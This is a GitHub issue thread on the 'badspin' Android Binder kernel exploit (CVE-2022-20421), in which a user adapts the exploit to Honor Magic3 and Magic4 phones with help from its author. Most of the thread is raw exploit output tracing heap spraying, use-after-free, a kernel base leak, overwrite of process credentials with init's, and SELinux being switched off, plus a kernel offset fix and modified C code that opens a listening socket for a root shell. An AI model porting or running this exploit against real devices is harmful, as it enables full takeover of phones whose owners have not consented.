search

0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License
226 stars 32 forks source link

Failed to adapt the exploit in a new device #12

Closed Securee closed 10 months ago

Securee commented 11 months ago

I want to adapt the exploit and support a new device( not Samsung or Google pixel), .android_version = 12, .android_security_patch.year = 2022, .android_security_patch.month = 3, .kernel_version = KERNEL_VERSION(5, 4, 134), .kimg_to_lm = pixel_kimg_to_lm, .find_kbase = noop_kbase, The uname -a is: Linux localhost 5.4.134-qgki-g27c154db7d6e #1 SMP PREEMPT Fri Mar 25 11:44:48 CST 2022 aarch64

I have tried many times, but it failed with the following output and then the phone panic:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [8265:8265] New binder client: A [8266:8266] New binder client: B [8267:8267] New binder client: C C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 4) Reading ptmx 0 Testing ptmx 1 (fd 5) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8320 [pipe_process:8321] Pinned to CPU 0 [pipe_process:8323] Pinned to CPU 2 [pipe_process:8324] Pinned to CPU 3 [pipe_process:8322] Pinned to CPU 1 [pipe_process:8325] Pinned to CPU 4 [pipe_process:8326] Pinned to CPU 5 [pipe_process:8327] Pinned to CPU 6 [pipe_process:8328] Pinned to CPU 7 [fd_master_process] pid = 8329 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8383] 30000 files sprayed [shaper_process:8385] 30000 files sprayed [shaper_process:8384] 30000 files sprayed [shaper_process:8382] 30000 files sprayed [shaper_process:8381] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8386 [timer_master_process] Wait for C to enter spin_lock() [8387:8387] New binder client: A [8389:8389] New binder client: C [8388:8388] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. .....................................!............ [x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done. [fd_master_process] pid = 8417 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8473] 30000 files sprayed [shaper_process:8469] 30000 files sprayed [shaper_process:8470] 30000 files sprayed [shaper_process:8472] 30000 files sprayed [shaper_process:8471] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8474 [timer_master_process] Wait for C to enter spin_lock() [8476:8476] New binder client: B [8480:8480] New binder client: C [8475:8475] New binder client: A A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted B: Searching for magic badcab1ebadcab1e.... A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. .................................*................

The panic info is: mReason: PANIC sReason:page_request info: PC filp_close+0x28/0xbc

And I have tried to change NR_EPFDS from 500 to 200, but it failed the same error. BTW, it seem to crash randomly.

Securee commented 10 months ago

If I use another kernel 5.10.66 in the same device, it will give me the following errror:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [6951:6951] New binder client: A [6952:6952] New binder client: B [6953:6953] New binder client: C C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying C: Wait for A... B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 4) Reading ptmx 0 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7358 [pipe_process:7359] Pinned to CPU 0 [pipe_process:7361] Pinned to CPU 2 [pipe_process:7364] Pinned to CPU 5 [pipe_process:7365] Pinned to CPU 6 [pipe_process:7363] Pinned to CPU 4 [pipe_process:7362] Pinned to CPU 3 [pipe_process:7360] Pinned to CPU 1 [pipe_process:7366] Pinned to CPU 7 [fd_master_process] pid = 7367 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:7441] 30000 files sprayed [shaper_process:7439] 30000 files sprayed [shaper_process:7440] 30000 files sprayed [shaper_process:7438] 30000 files sprayed [shaper_process:7437] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=7463 [timer_master_process] Wait for C to enter spin_lock() [7466:7466] New binder client: C [7465:7465] New binder client: B [7464:7464] New binder client: A A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done B: Finish. A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads [timer_master_process] Done. poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() ...............*.................................. [x] Success.

[x] send_dup_done done.

[x] usleep 25s done.

[x] write ipe_sockets done.

[fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers shaper process pid = 7437 shaper process pid = 7438 shaper process pid = 7439 shaper process pid = 7440 shaper process pid = 7441 Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe Error: failed to find corrupted pipe [fd_master_process] pid = 7528 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:7581] 30000 files sprayed [shaper_process:7583] 30000 files sprayed [shaper_process:7584] 30000 files sprayed [shaper_process:7580] 30000 files sprayed [shaper_process:7582] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=7596 [timer_master_process] Wait for C to enter spin_lock() [7597:7597] New binder client: A [7607:7607] New binder client: C [7599:7599] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB monitor_thread_a: Waiting for death notification B: Destroying monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done B: Finish. A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads (crash) It seems to fail to find corrupted pipe.

0xkol commented 10 months ago

Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue https://github.com/0xkol/badspin/issues/1

Which device is it?

Securee commented 10 months ago

Not sure why it fails to find the corrupted pipe. The first log seems similar to this issue #1

Which device is it?

The first log is Honor Magic3 with kernel 5.4 and the second log is Magic4 with kernel 5.10.66. I know I may need make some chage for kimg_to_lm and find_kbase, but it doesn't seem to have gotten that far yet.

And by print the log,the ret =0x00001000 while read pipe tmp_pipe[0] with FIONREAD in the code: SYSCHK(ioctl(tmp_pipe[0], FIONREAD, &ret));

0xkol commented 10 months ago

Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.

I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.

Securee commented 10 months ago

Unfortunately, due to my current commitments and the unavailability of an appropriate Android device for testing, I won't be able to assist you with this particular problem.

I hope you're able to resolve the issue independently, and if you have any questions related to the project in the future, please don't hesitate to ask. Thank you for your understanding.

Thank you anyway, I will try to resolve the issue myself firstly.

Securee commented 10 months ago

@0xkol , now that I can read the pipe correctly.

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [8833:8833] New binder client: A [8835:8835] New binder client: C [8834:8834] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 5) Reading ptmx 0 Testing ptmx 1 (fd 6) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8890 [pipe_process:8891] Pinned to CPU 0 [pipe_process:8892] Pinned to CPU 1 [pipe_process:8893] Pinned to CPU 2 [pipe_process:8894] Pinned to CPU 3 [pipe_process:8897] Pinned to CPU 6 [pipe_process:8895] Pinned to CPU 4 [pipe_process:8896] Pinned to CPU 5 [pipe_process:8898] Pinned to CPU 7 [fd_master_process] pid = 8899 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8952] 30000 files sprayed [shaper_process:8951] 30000 files sprayed [shaper_process:8953] 30000 files sprayed [shaper_process:8954] 30000 files sprayed [shaper_process:8955] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8957 [timer_master_process] Wait for C to enter spin_lock() [8960:8960] New binder client: C [8959:8959] New binder client: B [8958:8958] New binder client: A C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads [timer_master_process] Done. poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() ...............*.................................. [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 414143c4 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [x] Leaked pipe buffer oprerations: ffffffebc953c768 [x] Leaked pipe buffer page : ffffffff1fd16780 [+]Begin to find_kallsyms. [__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000 [__pipe_kread] Try to read pipe after write_fake_pipe_buffer (crash)

Securee commented 10 months ago

I reboot the device repeatedly, and the a8000000-aa6affff : Kernel code aa9b0000-aacbffff : Kernel data from cat /proc/iomem is the same. So I think there is no physical kASLR in my device.Right? If yes, so the kimg_to_lm I used by pixel_kimg_to_lm is correct. Then the rest is find_kbase function I may need to modify. But how can I judge whethor I need to modify it or not ?

Securee commented 10 months ago

By debug log, it seem to crash when: find_kallsyms -->rw->kread --> pipe_kread-->__pipe_kread with kaddr = ffffff8000000000 page = fffffffeffe00000. PAGE_OFFSET=0xffffff8000000000UL,and VMEMMAP_START=0xfffffffeffe00000UL.

0xkol commented 10 months ago

Maybe you should add the offset 0x28000000

Securee commented 10 months ago

@0xkol You are right. after I add the 0x28000000 to kimg_to_lm, It seem to go ahead:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [7533:7533] New binder client: A [7535:7535] New binder client: C [7534:7534] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 4) Reading ptmx 0 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 7999 [pipe_process:8000] Pinned to CPU 0 [pipe_process:8002] Pinned to CPU 2 [pipe_process:8003] Pinned to CPU 3 [pipe_process:8004] Pinned to CPU 4 [pipe_process:8001] Pinned to CPU 1 [pipe_process:8006] Pinned to CPU 6 [pipe_process:8005] Pinned to CPU 5 [pipe_process:8007] Pinned to CPU 7 [fd_master_process] pid = 8008 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8083] 30000 files sprayed [shaper_process:8082] 30000 files sprayed [shaper_process:8075] 30000 files sprayed [shaper_process:8074] 30000 files sprayed [shaper_process:8080] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8112 [timer_master_process] Wait for C to enter spin_lock() [8113:8113] New binder client: A [8114:8114] New binder client: B [8115:8115] New binder client: C C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B B: Searching for magic badcab1ebadcab1e.... C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. ..................................*............... [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 414144f5 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [x] Leaked pipe buffer oprerations: ffffffd98753c768 [x] Leaked pipe buffer page : ffffffff2042fc80 kallsyms_token_table file offset 0x2213b20 kallsyms_token_index file offset 0x2213ed0 kallsyms_markers file offset 0x22132b0 kallsyms_num_syms (approx) 0x21b00 kallsyms_num_syms (exact) 0x21a4d kallsyms_relative_base 0xffffffd985200000 kallsyms_names file offset 0x20313b8 kallsyms_offsets file offset 0x1faaa70 [x] kallsyms found successfully! [x] Kernel base: ffffffd985200000 [x] Found init_task: ffffffd987bcbe40 [x] task_struct offsets: tasks at 1224 pid at 1480 tgid at 1484 thread_group at 1656 files at 1984 cred at 1920 [x] files_struct offsets: fdt at 32 [x] task_struct: ffffff882959b780 [pipe_close] Found task struct: ffffff802316dc80 file->private_data offset: 216 Candidate write_buf offset: 752 (ffffff8023050000) Switched to UAO-based read/write primitive [x] Successfully upgraded to stable RW primitives. \o/ Fixup zombie processes Fixup pid = 7999 Found files struct: ffffff87a320bc80 Now killing pid 7999

[x] Success! Time to root Finding init cred init task_struct = ffffff878041a500 init cred = ffffff87a023f180 (usage 3) Switch 8545:-1 to new creds (ffffff87a023f180) task_struct (8545:-1) = ffffff882959ca00 cred = ffffff879e8da600 Change cred and real_cred Done Setting selinux_state->enforce to 0 status page = ffffffff1ead5e00 status page virt = ffffff87b3578000 Done Switch 7529:7529 to new creds (ffffff87a023f180) task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600 Change cred and real_cred Done [x] Reading live selinux policy [x] New selinux policy loaded Switch 7529:7529 to new creds (ffffff8791576600) task_struct (7529:7529) = ffffff802316dc80 cred = ffffff87a023f180 Change cred and real_cred Done Setting selinux_state->enforce to 1 status page = ffffffff1ead5e00 status page virt = ffffff87b3578000 Done Switch 7529:7529 to new creds (ffffff87a023f180) task_struct (7529:7529) = ffffff802316dc80 cred = ffffff8791576600 Change cred and real_cred Done escalate exit status = 0 Reset process state Could not open socket connection (the call of socket seem to fail with errno=11, try again. by netstat -ltw, can't find listening port 1337,so the connect failed.)

It seems that we are only one step away from final success.

Securee commented 10 months ago

Finally,I resolved the socket's problem by modify the connect_to function: int connect_to(const char *ip, int port) { int sockfd; sockfd = socket(PF_INET, SOCK_STREAM, 0);

struct sockaddr_in addr,cliAddr;
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons((uint16_t)port);
addr.sin_addr.s_addr = INADDR_ANY;

bind(sockfd, (struct sockaddr*)&addr, sizeof(addr));
LOG("[%s] waiting to connect to the socket......\n", __func__);
listen(sockfd,5);

int len = sizeof(cliAddr);
int clientfd = accept(sockfd, (struct sockaddr *) &cliAddr, &len);
LOG("[%s] client connect to the socket\n", __func__);
return clientfd;

}

Securee commented 10 months ago

image

Thank you very much for your help,@0xkol.

diabl0w commented 5 months ago

@0xkol , now that I can read the pipe correctly.

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [8833:8833] New binder client: A [8835:8835] New binder client: C [8834:8834] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 5) Reading ptmx 0 Testing ptmx 1 (fd 6) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 8890 [pipe_process:8891] Pinned to CPU 0 [pipe_process:8892] Pinned to CPU 1 [pipe_process:8893] Pinned to CPU 2 [pipe_process:8894] Pinned to CPU 3 [pipe_process:8897] Pinned to CPU 6 [pipe_process:8895] Pinned to CPU 4 [pipe_process:8896] Pinned to CPU 5 [pipe_process:8898] Pinned to CPU 7 [fd_master_process] pid = 8899 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:8952] 30000 files sprayed [shaper_process:8951] 30000 files sprayed [shaper_process:8953] 30000 files sprayed [shaper_process:8954] 30000 files sprayed [shaper_process:8955] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=8957 [timer_master_process] Wait for C to enter spin_lock() [8960:8960] New binder client: C [8959:8959] New binder client: B [8958:8958] New binder client: A C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads [timer_master_process] Done. poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() ...............*.................................. [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 414143c4 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [x] Leaked pipe buffer oprerations: ffffffebc953c768 [x] Leaked pipe buffer page : ffffffff1fd16780 [+]Begin to find_kallsyms. [__pipe_kread] kaddr = ffffff8000000000 page = fffffffeffe00000 size = 00001000 [__pipe_kread] Try to read pipe after write_fake_pipe_buffer (crash)

@Securee could you tell me what steps were necessary to get the the pipe to be read?